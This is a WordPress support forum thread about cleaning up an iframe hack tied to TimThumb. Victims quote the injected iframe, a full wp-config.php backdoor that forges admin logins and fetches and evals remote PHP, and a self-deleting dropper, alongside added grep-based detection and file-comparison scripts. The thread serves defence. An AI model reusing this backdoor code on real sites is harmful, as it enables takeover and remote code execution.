
[closed] [TimThumb Vulnerability] iframe hack (60 posts)

  1. secretja
    Member
    Posted 3 years ago #

    Hi,

    have somebody more info about

    <iframe id="iframe" style="width: 1px; height: 1px;" src=" http://counter-wordpress.com/frame.php">
    <html>
    <head>
    </head>
    <body>
    </body>
    </html>
    </iframe>

    Somebody hacked all my WP sites...

    THX to all who will help.

  2. milescatlett
    Member
    Posted 3 years ago #

    I am hosted on Bluehost.com. I was speaking to a customer service rep today. He said he noticed this appearing in an iframe on a non-Wordpress site. I have this on some of my sites also. I would appreciate any information anyone has.

    Thanks

    Miles

  3. secretja
    Member
    Posted 3 years ago #

    I have re-uploaded all WP sites and now all is OK. On one non-WP site I noticed the same thing, but I did the same as with the WP sites.

    Good luck Miles.

  4. ToucanCreative
    Member
    Posted 3 years ago #

    I just got this exact iframe hack on my wordpress site. I have scoured many many files, run antivirus/malware checks on the whole site without any success. I am hosted with VentraIP.com.au. This seems like a new hack given OP posted 2 hours ago. I noticed this just yesterday.

  5. Spirit_of_Martin
    Member
    Posted 3 years ago #

    Look in config.php

    delete code:

    // Backdoor appended to wp-config.php. Everything is driven by GET parameters,
    // so the attacker only has to request any page of the site:
    //   ?pingnow=login&pass=...          -> log in as "admin" with no password
    //   ?pingnow=exec&pass=...&file=URL  -> save URL as a random .php and open it
    //   ?pingnow=eval&pass=...&file=URL  -> fetch URL and eval() it in-process
    if (isset($_GET['pingnow']) && isset($_GET['pass'])) {
        // Shared "password" check (the value is empty in this copy)
        if ($_GET['pass'] == '') {
            // 1) Forge an authenticated session for the "admin" account
            if ($_GET['pingnow'] == 'login') {
                $user_login = 'admin';
                $user = get_userdatabylogin($user_login);
                $user_id = $user->ID;
                wp_set_current_user($user_id, $user_login);
                wp_set_auth_cookie($user_id);
                do_action('wp_login', $user_login);
            }
            // 2) Dropper: download a remote file into a randomly named .php in the
            //    current directory and redirect the browser to it
            if (($_GET['pingnow'] == 'exec') && (isset($_GET['file']))) {
                $ch = curl_init($_GET['file']);
                $fnm = md5(rand(0, 100)) . '.php';   // rand(0,100): only 101 possible names
                $fp = fopen($fnm, "w");
                curl_setopt($ch, CURLOPT_FILE, $fp);
                curl_setopt($ch, CURLOPT_HEADER, 0);
                curl_setopt($ch, CURLOPT_TIMEOUT, 5);
                curl_exec($ch);
                curl_close($ch);
                fclose($fp);
                echo "<SCRIPT LANGUAGE=\"JavaScript\">location.href='$fnm';</SCRIPT>";
            }
            // 3) Fetch remote PHP and execute it directly, nothing written to disk
            if (($_GET['pingnow'] == 'eval') && (isset($_GET['file']))) {
                $ch = curl_init($_GET['file']);
                curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
                curl_setopt($ch, CURLOPT_HEADER, 0);
                curl_setopt($ch, CURLOPT_TIMEOUT, 5);
                $re = curl_exec($ch);
                curl_close($ch);
                eval($re);
            }
        }
    }

    There is something somewhere else, still looking. I don't know how they hacked the site...

    Regards!
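
An added example, not posted in the thread: the fragment above has a few fixed tells that survive cosmetic changes: the forged admin login through get_userdatabylogin/wp_set_auth_cookie, the ?pingnow= switch, curl_init() on a $_GET value and eval() of a variable. The shell script below greps every .php file under a site root for those indicators. The sample tree it builds, including the placeholder password hash, is constructed for the demo and is not data from the thread.

```shell
#!/bin/sh
# Added example (not from the thread): sweep a WordPress tree for the
# indicators present in the wp-config.php backdoor posted above. The tree
# built by make_demo_tree is constructed test data with a placeholder hash.
set -eu

# One extended regex covering the posted snippet's tell-tale calls:
# forging an admin session, the ?pingnow= switch, eval() of a variable,
# and curl fetching a URL taken straight from $_GET.
BACKDOOR_RE='wp_set_auth_cookie|get_userdatabylogin|\$_GET\[.pingnow.\]|eval\(\$|curl_init\(\$_GET'

# scan_php_tree ROOT: print "file:line:text" for every matching line in *.php
scan_php_tree() {
    find "$1" -type f -name '*.php' -exec grep -HnE "$BACKDOOR_RE" {} + || true
}

# flagged_files ROOT: distinct files with at least one hit
flagged_files() {
    scan_php_tree "$1" | cut -d: -f1 | sort -u
}

# count_lines: line count without the leading spaces BSD wc prints
count_lines() { wc -l | tr -d ' '; }

# make_demo_tree DIR: constructed mini site; one clean theme file plus a
# wp-config.php carrying a fragment modelled on the posted backdoor.
make_demo_tree() {
    mkdir -p "$1/wp-content/themes/demo"
    printf '%s\n' '<?php' 'echo "clean theme file";' \
        > "$1/wp-content/themes/demo/functions.php"
    cat > "$1/wp-config.php" <<'EOF'
<?php
define('DB_NAME', 'wordpress');
if (isset($_GET['pingnow'])&& isset($_GET['pass'])){
if ($_GET['pass'] == 'PLACEHOLDER_HASH'){
if ($_GET['pingnow']== 'login'){
$user = get_userdatabylogin('admin');
wp_set_auth_cookie($user->ID);
}
if (($_GET['pingnow']== 'eval')&&(isset($_GET['file']))){
$ch = curl_init($_GET['file']);
$re = curl_exec($ch);
eval($re);
}}}
EOF
}

# Stand-alone run: build the demo tree, report, clean up.
demo=$(mktemp -d)
make_demo_tree "$demo"
echo "Files with backdoor indicators under $demo:"
flagged_files "$demo"
echo "Matching lines: $(scan_php_tree "$demo" | count_lines)"
rm -rf "$demo"
```

Run it against the real document root instead of the demo directory with scan_php_tree /path/to/site. A hit is a reason to read the file, not proof by itself: legitimate plugins do call curl_init, but a call to get_userdatabylogin or wp_set_auth_cookie inside wp-config.php, .htaccess-adjacent files or theme templates has no business being there.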

  6. ToucanCreative
    Member
    Posted 3 years ago #

    I also re-uploaded my WP files, and everything seems to be in order again - for now at least!

  7. baluba
    Member
    Posted 3 years ago #

    Interesting, seeing the same iframe code in some of my Joomla sites too.

  8. milescatlett
    Member
    Posted 3 years ago #

    I'm not sure what it does, but I have had sites that have been redirecting to other locations (sometimes sleazy, music playing, etc...).

    But I have also been upgrading timthumb so those things could be related to that.

    @secretja, What do you mean by reupload? Are you installing a fresh theme, or exporting the content of an old site and creating a new wordpress site? I'm afraid to download the whole database for fear it might have malicious code in it...

    Thanks for all your help....

  9. secretja
    Member
    Posted 3 years ago #

    Hi,

    It is not in the theme files... it is somewhere else. I downloaded a fresh WP and uploaded/upgraded all WP sites. Now it is OK.

  10. Elmo_is_evil
    Member
    Posted 3 years ago #

    Got this as well after being affected by PHPRemoteView via timthumb ....

    Now PHPRemoteView is gone, timthumb is up to date, but after removing it yesterday (In my case a JS), it came back this morning ...

    Mine was embedded in a JS, \wp-includes\js\l10n.js yesterday, and this morning \wp-includes\js\l10n.js and \wp-includes\js\jquery\jquery.js .... The code is obfuscated ....

    I already mention it on a PHPRemoteView topic ....

    http://wordpress.org/support/topic/two-strange-errors?replies=22#post-2289404

  11. Once you've removed TimThumb, you STILL need to perform the usual steps.

    1) Change ALL YOUR PASSWORDS
    2) Scan ALL your files (esp. .htaccess) for anything hinky.

    Best would be to delete and re-upload everything fresh, and then change every single password, from WP to FTP and SQL.

  12. Elmo_is_evil
    Member
    Posted 3 years ago #

    Damn, sometimes I'm a tool, I just forgot to upload the clean wp-config.php ....

    Anyway, still looking to be sure ....

    Spirit_of_Martin, my PHP is a little bit rusty, but basically this bit of PHP gave the attacker the cookie of the admin in the first condition; the second looks like some kind of scanner/patcher, and the third a file downloader ....

    My guess is that there's a tool on top of it (On another server or computer) ....

  13. Devin Walker
    Member
    Posted 3 years ago #

    The same thing happened to us today on our site. We've been getting hit with attacks all seemingly coming from the timthumb vulnerability. We have updated timthumb but this keeps happening. I'm guessing there's a missing back door somewhere.

    What's really concerning to me is that my site's database password has been commented out and changed. I'm wondering if there's anything wrong with my database now...

  14. secretja
    Member
    Posted 3 years ago #

    I got it again. Damn.

  15. Then you're not cleaning it up right.

    Best way at this point would be to do this:
    1) backup EVERYTHING to your PC. Files and DB.

    2) DELETE the files on your server. Yeah. Don't worry, your posts are on your database, we're leaving that alone.

    3) Change your passwords for SSH/FTP and SQL

    4) On your PC, review the following files:
    .htaccess
    wp-config.php

    They look okay? Good. Copy them back up to your server (remember to edit your wp-config.php with your new SQL password).

    5) Get FRESH and CLEAN downloads of WordPress, all your themes and plugins

    6) As soon as you get in, change your passwords.

  16. milescatlett
    Member
    Posted 3 years ago #

    This may be a dumb question, but I can see counter-wordpress loading on my site. However, when I right click on the page to view source or try to view it in firebug, I can't find an iframe or "counter" in the source code. Where is it, so I can know if it's gone?

  17. Check at http://sitecheck.sucuri.net/scanner/ It should tell you

  18. milescatlett
    Member
    Posted 3 years ago #

    Thank you so much!

  19. milescatlett
    Member
    Posted 3 years ago #

    Just found this on one of my sites. It looks bad. Anything special I should do? It was in the wp-config file:

    // Same backdoor as in post 5 above, this time with the real password check:
    // the attacker has to send ?pass=ea5d2f1c4608232e07d3aa3d998e5135 to use it.
    if (isset($_GET['pingnow']) && isset($_GET['pass'])) {
        if ($_GET['pass'] == 'ea5d2f1c4608232e07d3aa3d998e5135') {
            // forge an "admin" session
            if ($_GET['pingnow'] == 'login') {
                $user_login = 'admin';
                $user = get_userdatabylogin($user_login);
                $user_id = $user->ID;
                wp_set_current_user($user_id, $user_login);
                wp_set_auth_cookie($user_id);
                do_action('wp_login', $user_login);
            }
            // download a remote file to a random .php and redirect to it
            if (($_GET['pingnow'] == 'exec') && (isset($_GET['file']))) {
                $ch = curl_init($_GET['file']);
                $fnm = md5(rand(0, 100)) . '.php';
                $fp = fopen($fnm, "w");
                curl_setopt($ch, CURLOPT_FILE, $fp);
                curl_setopt($ch, CURLOPT_HEADER, 0);
                curl_setopt($ch, CURLOPT_TIMEOUT, 5);
                curl_exec($ch);
                curl_close($ch);
                fclose($fp);
                echo "<SCRIPT LANGUAGE=\"JavaScript\">location.href='$fnm';</SCRIPT>";
            }
            // fetch remote PHP and eval() it without writing to disk
            if (($_GET['pingnow'] == 'eval') && (isset($_GET['file']))) {
                $ch = curl_init($_GET['file']);
                curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
                curl_setopt($ch, CURLOPT_HEADER, 0);
                curl_setopt($ch, CURLOPT_TIMEOUT, 5);
                $re = curl_exec($ch);
                curl_close($ch);
                eval($re);
            }
        }
    }

  20. Same advice as before.

    http://wordpress.org/support/topic/iframe-hack-3?replies=18#post-2290168

    You need to rip that code out, ALL of it, change your passwords and clean your site.

  21. milescatlett
    Member
    Posted 3 years ago #

    Ipstenu, you are a HUGE help. Thanks so much!

  22. secretja
    Member
    Posted 3 years ago #

    Hi,

    I hope that I got rid of that s...

    1 step - install fresh wp and template
    2 change all passwords

    check
    wp-config

    and after that I have found next:
    /wp-content/upd.php

    <?php
    // Dropper found as /wp-content/upd.php. It works out the WordPress root from
    // its own path, rewrites the site's index.php to swap one hostname for
    // another (presumably re-pointing an earlier injection), then deletes itself.
    $file = __FILE__;
    $pos = strpos($file, 'wp-content');
    $dir = substr($file, 0, $pos);             // everything before "wp-content" = WP root
    $index = file_get_contents($dir . 'index.php');
    $index = str_replace('superpuperdomain.com', 'superpuperdomain2.com', $index);
    $f = fopen($dir . 'index.php', "w");
    fputs($f, $index);
    fclose($f);
    unlink($file);                             // remove the dropper itself
    ?>

    and
    /wp-content/2b64c2f19d868305aa8bbc2d72902cc5.php

    because of that you need to check wp-content
    Delete those files.

    For now all is OK.

    Good luck guys... ;)

  23. Spirit_of_Martin
    Member
    Posted 3 years ago #

    Look for an old jquery.js in your template - delete the old one or upgrade; it looks like sometimes there is also something in there with this iframe hack.

  24. 1 step - install fresh wp and template

    Instead, DELETE WP and then upload. It's the only way to scrub out ALL the files. Then you only have to manually check .htaccess and wp-config.php (and if you've uploaded any non-images I suppose....)

    Delete it all EXCEPT for:
    wp-config.php
    .htaccess
    /wp-content/uploads

    And even then you have to scan those two files AND look for any .php files in /wp-content/uploads/

    I wish it was easier :(
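
An added example, not from the thread: the delete-and-reupload advice above amounts to "anything that differs from a clean WordPress of the same version is suspect, read wp-config.php and .htaccess by hand, and allow no PHP under /wp-content/uploads/". The script below does that comparison with POSIX tools against a clean copy you downloaded yourself (the same fresh copy you would re-upload, with the same themes and plugins unpacked into it). The two trees it builds are constructed to mirror the findings reported in this thread (a jquery.js with appended code, a stray wp-content/upd.php, a .php inside uploads) and are not data from the thread.

```shell
#!/bin/sh
# Added example (not from the thread): compare a live WordPress tree with a
# clean copy of the same version, the way the "delete everything and check
# wp-config.php, .htaccess and /wp-content/uploads by hand" advice above
# implies. make_demo_pair builds constructed sample trees for the run.
set -eu

# file_list ROOT: relative paths of all regular files under ROOT, sorted
file_list() {
    (cd "$1" && find . -type f | sed 's|^\./||' | sort)
}

# checksum FILE: CRC from POSIX cksum; fine for comparing against a clean
# copy you fetched yourself, not a substitute for a signed manifest
checksum() { cksum "$1" | cut -d' ' -f1; }

# compare_trees CLEAN LIVE: one line per LIVE file that needs attention
#   REVIEW          site-specific file with no clean reference; read it by hand
#   PHP-IN-UPLOADS  executable code where only media should live
#   EXTRA           file not shipped in the clean tree (droppers, random-name .php)
#   MODIFIED        shipped file whose content differs (e.g. a patched jquery.js)
compare_trees() {
    clean=$1
    live=$2
    file_list "$live" | while IFS= read -r rel; do
        case "$rel" in
            wp-config.php|.htaccess)
                printf '%-15s %s\n' REVIEW "$rel" ;;
            wp-content/uploads/*)
                case "$rel" in
                    *.php|*.phtml|*.php5|*.phar)
                        printf '%-15s %s\n' PHP-IN-UPLOADS "$rel" ;;
                esac ;;
            *)
                if [ ! -f "$clean/$rel" ]; then
                    printf '%-15s %s\n' EXTRA "$rel"
                elif [ "$(checksum "$clean/$rel")" != "$(checksum "$live/$rel")" ]; then
                    printf '%-15s %s\n' MODIFIED "$rel"
                fi ;;
        esac
    done
}

# count_lines: line count without the leading spaces BSD wc prints
count_lines() { wc -l | tr -d ' '; }

# make_demo_pair BASE: constructed BASE/clean and BASE/live trees. live has
# the kinds of findings reported in the thread: an appended jquery.js, a
# stray wp-content/upd.php, and a .php inside uploads.
make_demo_pair() {
    for t in clean live; do
        mkdir -p "$1/$t/wp-includes/js" "$1/$t/wp-content/themes/demo"
        printf '%s\n' '<?php require "wp-blog-header.php";' > "$1/$t/index.php"
        printf '%s\n' '/* jquery demo stub */' > "$1/$t/wp-includes/js/jquery.js"
        printf '%s\n' '/* l10n demo stub */' > "$1/$t/wp-includes/js/l10n.js"
        printf '%s\n' 'body { margin: 0; }' > "$1/$t/wp-content/themes/demo/style.css"
    done
    live=$1/live
    printf '%s\n' 'document.write("<iframe src=...>"); /* constructed appended payload */' \
        >> "$live/wp-includes/js/jquery.js"
    printf '%s\n' '<?php /* constructed dropper stand-in */' > "$live/wp-content/upd.php"
    mkdir -p "$live/wp-content/uploads/2011"
    printf 'not really a jpeg\n' > "$live/wp-content/uploads/2011/photo.jpg"
    printf '%s\n' '<?php /* constructed web shell stand-in */' \
        > "$live/wp-content/uploads/2011/shell.php"
    printf '%s\n' '<?php define("DB_NAME", "wordpress");' > "$live/wp-config.php"
    printf '%s\n' 'RewriteEngine On' > "$live/.htaccess"
}

# Stand-alone run
base=$(mktemp -d)
make_demo_pair "$base"
compare_trees "$base/clean" "$base/live"
rm -rf "$base"
```

Against a real site: unpack the fresh WordPress, themes and plugins into one directory, then run compare_trees /path/to/clean /path/to/live from a shell on the server or on a downloaded copy. Every MODIFIED and EXTRA line is something deleting-and-reuploading would have removed, and the two REVIEW files are the ones the posts above tell you to read by hand.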

  25. Elmo_is_evil
    Member
    Posted 3 years ago #

    This may be a dumb question, but I can see counter-wordpress loading on my site. However, when I right click on the page to view source or try to view it in firebug, I can't find an iframe or "counter" in the source code. Where is it, so I can know if it's gone?

    Because it's loaded by a JS file... Clever way to hide this kind of thing ....

    My WP installation is OK now; I didn't delete and reinstall, but I basically did a byte-by-byte comparison of the files (with one of my backups, and the files from 3.2.1).

    But anyway, in my case the goal was to analyse what they did ....

    The best way to be secure, is obviously to delete and reinstall ....

    (Sorry for my English this morning, still no coffee in the system ...)

  26. Jorge
    Member
    Posted 3 years ago #

    I wish it was easier :(

    Me too, I have been battling this iframe for the past week. I deleted the entire WP install and reinstalled.

    First I found the iframe in the theme and after the reinstall, it's in the wp-admin area...not good.

    I'm thinking the injection might be in the DB because how else can it contaminate my installation AND not be purged when I deleted all the files?

    I'm going to have to do a complete reinstallation with a new DB and see how it goes.

  27. Devin Walker
    Member
    Posted 3 years ago #

    @Jorge,

    Was your db changed in wp-config.php? Because ours was and I since have changed the password on it and removed the iframe and been monitoring the site to see if it's coming back. I'm really hoping the database hasn't been affected. Let me know what you find.

  28. Did you delete the files AND change your password AND scan your wp-config.php and .htaccess for possible violations?

    Did you remove EVERYTHING in wp-content (except for the /uploads/ folder)?

    Did you change all your passwords?

  29. Jorge
    Member
    Posted 3 years ago #

    Did you delete the files AND change your password AND scan your wp-config.php and .htaccess for possible violations?

    Did you remove EVERYTHING in wp-content (except for the /uploads/ folder)?

    Did you change all your passwords?

    Yes, just finished another install with a fresh database.

    Went to the wp-admin area, and nothing. I went to the Manage Themes page and bam, it's there.

    I'm using Chrome - I right click and click on "Inspect Element" - the iframe is there.

    <iframe id="iframe" style="width: 1px; height: 1px; " src="http://counter-wordpress.com/frame.php"></iframe>

    View source shows nothing but that's a given. This is driving me bonkers.

    EDIT: If the malicious script was in the DB, it would not have been an issue because like I said, it was a fresh install with a new DB with different passwords, etc.

  30. Jorge - Call your webhost ASAFP and tell them this, because it looks like your server's compromised.
